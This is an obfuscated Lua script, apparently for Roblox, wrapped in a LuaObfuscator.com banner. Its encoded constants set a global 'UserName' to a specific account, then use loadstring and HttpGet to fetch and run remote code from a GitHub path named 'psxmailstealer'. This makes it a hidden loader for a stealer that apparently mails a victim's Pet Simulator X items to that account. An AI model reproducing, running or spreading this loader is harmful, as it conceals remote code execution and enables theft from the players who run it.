--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v72=0;while true do if (v72==0) then v19=v0(v3(v30,1,1));return "";end end else local v73=v2(v0(v30,16));if v19 then local v92=v5(v73,v19);v19=nil;return v92;else return v73;end end end);local function v20(v31,v32,v33)if v33 then local v74=(v31/((1 + 1)^(v32-(1 + 0))))%((1 + 1)^(((v33-(523 -(32 + 490))) -(v32-(4 -3))) + (3 -2))) ;return v74-(v74%(1942 -(1195 + (1283 -(159 + 378))))) ;else local v75=(2 + 0)^(v32-(1 + 0 + 0)) ;return (((v31%(v75 + v75))>=v75) and (381 -(28 + 352))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;return (v36 * (660 -404)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1417 -(1334 + 80)) );v18=v18 + ((4706 -3266) -(399 + 1037)) ;return (v40 * (52208292 -35431076)) + (v39 * (26952 + 38584)) + (v38 * 256) + v37 ;end local function v24()local v41=1544 -(235 + 451 + 858) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1 + 0)) then v44=1 + (518 -(86 + 432)) ;v45=(v20(v43,(128 -(52 + 74)) -1 ,(50 + 43) -73 ) * (2^(15 + 17))) + v42 ;v41=7 -5 ;end if ((2 -0)==v41) then v46=v20(v43,10 + 11 ,31);v47=((v20(v43,30 + (4 -2) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;v41=3;end if (v41==(725 -(510 + 215))) then v42=v23();v43=v23();v41=1 + 0 ;end if (v41==(9 -6)) then if (v46==(0 + 0)) then if (v45==((0 + 0) -(221 -(17 + 204)))) then return v47 * 0 ;else local v99=(0 -0) -0 ;while true do if (v99==(0 -0)) then v46=789 -(605 + 183) ;v44=1715 -(849 + 866) ;break;end end end elseif (v46==((2959 + 3110) -4022)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((873 -(274 + 597))^(10 + 42)))) ;end end end local function v25(v48)local v49;if  not v48 then local v76=(0 -0) -0 ;while true do if (v76==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((4 -3) -0) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=3) then else v58=nil;while true do local v93=0;local v94;while true do if (v93~=(0 -0)) then else v94=0 + 0 ;while true do if (v94~=(199 -(123 + 75))) then else if (v52==(1 + 0)) then v57=v23();v58={};for v107=1 + 0 ,v57 do local v108=0;local v109;local v110;local v111;while true do if (v108~=(3 -2)) then else v111=nil;while true do if (v109~=(2 -1)) then else if (v110==1) then v111=v21()~=0 ;elseif (v110==(126 -(26 + 98))) then v111=v24();elseif (v110~=(1747 -(703 + 1041))) then else v111=v25();end v58[v107]=v111;break;end if (v109==(0 + 0)) then local v138=0;while true do if (v138~=(162 -(32 + 130))) then else v110=v21();v111=nil;v138=1;end if (v138==1) then v109=1;break;end end end end break;end if (v108==0) then v109=0 -0 ;v110=nil;v108=1;end end end v56[8 -5 ]=v21();v52=616 -(555 + 59) ;end break;end if ((0 -0)~=v94) then else if (v52==(1533 -(727 + 806))) then local v102=0 + 0 ;while true do if (v102==0) then v53={};v54={};v102=1 + 0 ;end if (v102~=2) then else v52=1912 -(1053 + 858) ;break;end if (v102==(1 -0)) then v55={};v56={v53,v54,nil,v55};v102=2;end end end if (v52~=2) then else local v103=0;local v104;while true do if (v103==0) then v104=0 + 0 ;while true do local v115=0;while true do if (v115~=0) then else if (v104==(1664 -(754 + 909))) then for v140=1 -0 ,v23() do v55[v140]=v23();end return v56;end if (v104~=0) then else for v142=1,v23() do local v143=0;local v144;local v145;while true do if (v143~=0) then else v144=0;v145=nil;v143=560 -(288 + 271) ;end if (1~=v143) then else while true do if (v144~=(1623 -(886 + 737))) then else v145=v21();if (v20(v145,1,583 -(386 + 196) )~=(0 + 0)) then else local v160=0;local v161;local v162;local v163;local v164;local v165;local v166;while true do if (v160==0) then v161=0;v162=nil;v160=1 -0 ;end if ((1341 -(547 + 791))~=v160) then else while true do if (v161==(2 + 0)) then v166=nil;while true do if (v162==(3 -2)) then v165=nil;v166=nil;v162=2;end if ((976 -(550 + 426))~=v162) then else local v172=0 + 0 ;local v173;while true do if (0~=v172) then else v173=0;while true do if (v173==0) then v163=0 + 0 ;v164=nil;v173=3 -2 ;end if (1==v173) then v162=1;break;end end break;end end end if (v162==2) then while true do if (v163~=(753 -(107 + 643))) then else if (v20(v165,3,3)==1) then v166[245 -(37 + 204) ]=v58[v166[2 + 2 ]];end v53[v142]=v166;break;end if (v163==(0 + 0)) then local v175=0;local v176;while true do if (v175~=(1562 -(736 + 826))) then else v176=0;while true do if (0~=v176) then else local v183=0;while true do if (v183==1) then v176=2 -1 ;break;end if ((33 -(27 + 6))~=v183) then else local v187=0;while true do if (v187==0) then v164=v20(v145,2,3);v165=v20(v145,3 + 1 ,2 + 4 );v187=1;end if (v187~=1) then else v183=1;break;end end end end end if (v176~=(2 -1)) then else v163=1;break;end end break;end end end if (v163==1) then local v177=860 -(270 + 590) ;local v178;while true do if (v177==0) then v178=1365 -(16 + 1349) ;while true do if (v178~=1) then else v163=2;break;end if (v178~=(964 -(140 + 824))) then else v166={v22(),v22(),nil,nil};if (v164==0) then local v185=881 -(724 + 157) ;local v186;while true do if (v185~=0) then else v186=0 -0 ;while true do if ((1292 -(767 + 525))==v186) then v166[1 + 2 ]=v22();v166[4]=v22();break;end end break;end end elseif (v164==1) then v166[3]=v23();elseif (v164==2) then v166[1 + 2 ]=v23() -((1 + 1)^16) ;elseif (v164==3) then local v196=0;local v197;local v198;while true do if (v196==(337 -(62 + 275))) then v197=1094 -(22 + 1072) ;v198=nil;v196=1 + 0 ;end if (v196==(1528 -(979 + 548))) then while true do if (v197~=0) then else v198=0;while true do if (0~=v198) then else v166[3]=v23() -(2^(7 + 9)) ;v166[1949 -(236 + 1709) ]=v22();break;end end break;end end break;end end end v178=1;end end break;end end end if (2~=v163) then else local v179=0 -0 ;local v180;while true do if (v179~=(854 -(797 + 57))) then else v180=674 -(384 + 290) ;while true do if (v180~=(0 -0)) then else local v184=0 + 0 ;while true do if (v184==(2 -1)) then v180=1346 -(325 + 1020) ;break;end if (v184~=(0 + 0)) then else if (v20(v165,1 + 0 ,1)==(1 -0)) then v166[1386 -(1294 + 90) ]=v58[v166[2]];end if (v20(v165,4 -2 ,2 -0 )~=(70 -(64 + 5))) then else v166[3]=v58[v166[3]];end v184=1;end end end if (v180~=(1 + 0)) then else v163=1 + 2 ;break;end end break;end end end end break;end end break;end if (v161~=0) then else v162=0;v163=nil;v161=1649 -(73 + 1575) ;end if (v161==(672 -(553 + 118))) then v164=nil;v165=nil;v161=2;end end break;end if (v160~=2) then else v165=nil;v166=nil;v160=2 + 1 ;end if (v160~=(1 + 0)) then else v163=nil;v164=nil;v160=1627 -(913 + 712) ;end end end break;end end break;end end end for v146=1,v23() do v54[v146-1 ]=v28();end v104=529 -(451 + 77) ;end break;end end end break;end end end v94=1 + 0 ;end end break;end end end break;end if (v51~=(2 + 0)) then else v56=nil;v57=nil;v51=953 -(505 + 445) ;end if (v51~=0) then else v52=648 -(608 + 40) ;v53=nil;v51=1;end if (v51==1) then v54=nil;v55=nil;v51=161 -(31 + 128) ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v77=v62;local v78=v63;local v79=v64;local v80=v27;local v81={};local v82={};local v83={};for v87=0,v70 do if ((v87>=v79) or ((439 + 1433)==(5090 -(36 + 57)))) then v81[v87-v79 ]=v69[v87 + 1 + 0 ];else v83[v87]=v69[v87 + 1 + 0 ];end end local v84=(v70-v79) + (292 -(215 + 76)) ;local v85;local v86;while true do local v88=0;local v89;while true do if ((0==v88) or (808>(2948 -(617 + 451)))) then v89=0 -0 ;while true do if ((v89==(0 + 0)) or ((1818 -749)==(168 -31))) then local v100=179 -(15 + 86 + 78) ;while true do if ((v100==0) or (3039<2397)) then v85=v77[v67];v86=v85[1];v100=1 -(0 + 0) ;end if (((1858 -(407 + 1450))==v100) or ((1467 -(11 + 602))>2505)) then v89=(6 -3) -(467 -(211 + 254)) ;break;end end end if (((1 -0)==v89) or ((4667 -(468 + 1426))>(8127 -4307))) then if ((1620<=(5416 -(261 + 1709))) and (v86<=(5 + 0))) then if (((3103 -(249 + 1250))>=((443 -315) + 169)) and (v86<=(2 + 0))) then if ((v86<=(0 -0)) or ((2577 + 441)<=(2907 -1478))) then if (((3152 -1260)>=(45 + 37)) and (v85[2]==v83[v85[14 -10 ]])) then v67=v67 + (2 -1) ;else v67=v85[8 -5 ];end elseif (((1985 -1333)<=(5033 -(14417 -11383))) and (v86>1)) then v83[v85[2 + 0 ]]=v61[v85[6 -3 ]];else v83[v85[5 -3 ]]=v85[4 -1 ];end elseif (((4338 -2094)<(2984 -((666 -(287 + 336)) + 405))) and (v86<=(1335 -(430 + 902)))) then v83[v85[1752 -(370 + 1380) ]]=v85[1025 -(966 + 56) ]~=(0 + (0 -0)) ;elseif ((v86>((1704 -(943 + 746)) -(1319 -(1307 + 1)))) or (((1166 + 2651) -((2145 -(1359 + 262)) + 445))>=(7237 -2613))) then v83[v85[1 + 1 ]]();else local v121=(1443 -842) -(548 + 53) ;local v122;local v123;local v124;local v125;local v126;while true do if (((3125 + 623)>2519) and (v121==((893 -(40 + 852)) + 0))) then v124=nil;v125=nil;v121=2 + 0 ;end if ((v121==2) or ((5269 -3365)>=(1566 + 2999))) then v126=nil;while true do if ((2762==(3000 -(229 + 9))) and (v122==((2 + 0) -(603 -(67 + 535))))) then v68=(v125 + v123) -(1 + 0) ;v126=0 -(0 + 0) ;v122=1 + 1 ;end if ((v122==(1268 -(544 + (994 -270)))) or ((6846 -3426)>(5695 -(1059 + 408)))) then v123=v85[2];v124,v125=v80(v83[v123](v13(v83,v123 + 1 ,v85[3 + 0 ])));v122=1 + 0 ;end if ((v122==(2 -0)) or ((4436 + 145)==1499)) then for v150=v123,v68 do local v151=1111 -(383 + 728) ;local v152;while true do if ((v151==0) or ((4236 -(252 + 196))==(2647 -(66 + 90)))) then v152=0 + 0 ;while true do if ((v152==((382 -(69 + 189)) -(23 + 101))) or (1007>=(3307 -819))) then v126=v126 + 1 ;v83[v150]=v124[v126];break;end end break;end end end break;end end break;end if (((0 + 0)==v121) or ((12455 -7637)>=(73 + 4758))) then v122=0;v123=nil;v121=1 + 0 ;end end end elseif ((2527<(4448 -(812 + 551))) and (v86<=8)) then if (((2042 -1367)<2396) and (v86<=(1 + 5))) then do return;end elseif ((v86>(259 -(228 + 24))) or ((2416 -742)>=(3699 -(849 + 590)))) then local v127=0 -0 ;local v128;local v129;local v130;local v131;while true do if ((v127==((2455 -(244 + 789)) -(361 + 324 + 736))) or (4705<(494 + 2622))) then v130=nil;v131=nil;v127=1 + 1 ;end if ((v127==0) or ((2093 -(654 + 573 + 486))>(9835 -7319))) then v128=0;v129=nil;v127=4 -3 ;end if (((7269 -4878)==(6820 -(5817 -(1151 + 237)))) and (v127==2)) then while true do if ((v128==((0 + 0) -0)) or ((1546 + 47)<(1391 -(703 + 7)))) then local v149=0 + 0 ;while true do if ((v149==(0 -0)) or ((1512 -889)==(4985 -(1219 + 408)))) then v129=1824 -(768 + 1056) ;v130=nil;v149=1;end if ((v149==1) or (3389<(6410 -3419))) then v128=247 -(98 + 148) ;break;end end end if ((v128==(1 -0)) or (3957<(4729 -3036))) then v131=nil;while true do if ((v129==(1253 -(1048 + 204))) or ((4019 -(352 + 357))<=((12238 -7031) -3876))) then v83[v130 + 1 ]=v131;v83[v130]=v131[v85[3 + 1 ]];break;end if ((v129==(0 -(0 -0))) or ((4491 -2883)<(78 -(24 + 14)))) then local v156=0;local v157;while true do if ((v156==0) or ((11537 -7393)<(303 + 1801))) then v157=0;while true do if ((v157==(3 -(1 + 1))) or ((5993 -(409 + 1511))<(3952 -(72 + 755)))) then v129=1359 -(9 + 1349) ;break;end if ((((3420 -(451 + 149)) -(1510 + 270))<=(4242 -(551 + 893 + 228))) and (v157==(0 + 0))) then local v169=717 -(365 + 352) ;while true do if (((524 + 345)<=(14059 -9113)) and ((0 -0)==v169)) then v130=v85[5 -3 ];v131=v83[v85[3]];v169=4 -3 ;end if (((5168 -1897)>=(4832 -2634)) and (v169==(1 + 0))) then v157=538 -((554 -(314 + 47)) + 344) ;break;end end end end break;end end end end break;end end break;end end else v67=v85[3];end elseif (((2094 + 7)==(3017 -(681 + 235))) and (v86<=9)) then v83[v85[2 -0 ]][v85[2 + 1 ]]=v85[(33 -19) -10 ];elseif ((v86>(2 + 8)) or ((1080 + 3226)<=((3142 -(1524 + 381)) + 1332))) then local v133=0 -0 ;local v134;local v135;local v136;while true do if ((1==v133) or ((5 + (162 -(102 + 4)))>=(452 + 3649))) then v136=nil;while true do if ((v134==(719 -(245 + 474))) or (138>(4501 -(117 + 1389)))) then v135=0 + 0 ;v136=nil;v134=2 -1 ;end if (((24 + (29 -10))<(4683 -(1204 + 216))) and (1==v134)) then while true do if (((246 + 487)<=(2287 + 2482)) and (v135==(1960 -(1235 + 725)))) then v136=v85[2 -0 ];v83[v136]=v83[v136](v13(v83,v136 + (3 -(444 -(24 + 418))) ,v68));break;end end break;end end break;end if (((16734 -11957)>=1900) and (v133==(0 + 0))) then v134=0 + 0 ;v135=nil;v133=1 + 0 ;end end elseif ((v83[v85[4 -(7 -5) ]]==v85[1 + 3 ]) or ((3448 -1701)<=(3370 -((1326 -(397 + 850)) + 1887)))) then v67=v67 + (1398 -(422 + 975)) + 0 ;else v67=v85[1216 -(246 + 967) ];end v67=v67 + 1 ;break;end end break;end end end end A,B=v27(v11(v71));if  not A[1] then local v90=0;local v91;while true do if (v90==0) then v91=v59[4][v67] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O0003023O005F4703083O00557365724E616D6503083O0064616C696C2O393003093O00557365724E616D6532026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F70737873637269707465726D616E2F7073786861636B2F6D61696E2F7073786D61696C737465616C657200153O0012013O00013O000E2O0001000800013O0004073O00080001001202000100023O003009000100030004001202000100023O0030090001000500040012013O00063O00260A3O0001000100060004073O00010001001202000100073O001202000200083O0020080002000200090012010004000A4O0003000500014O0004000200054O000B00013O00022O00050001000100010004073O001400010004073O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
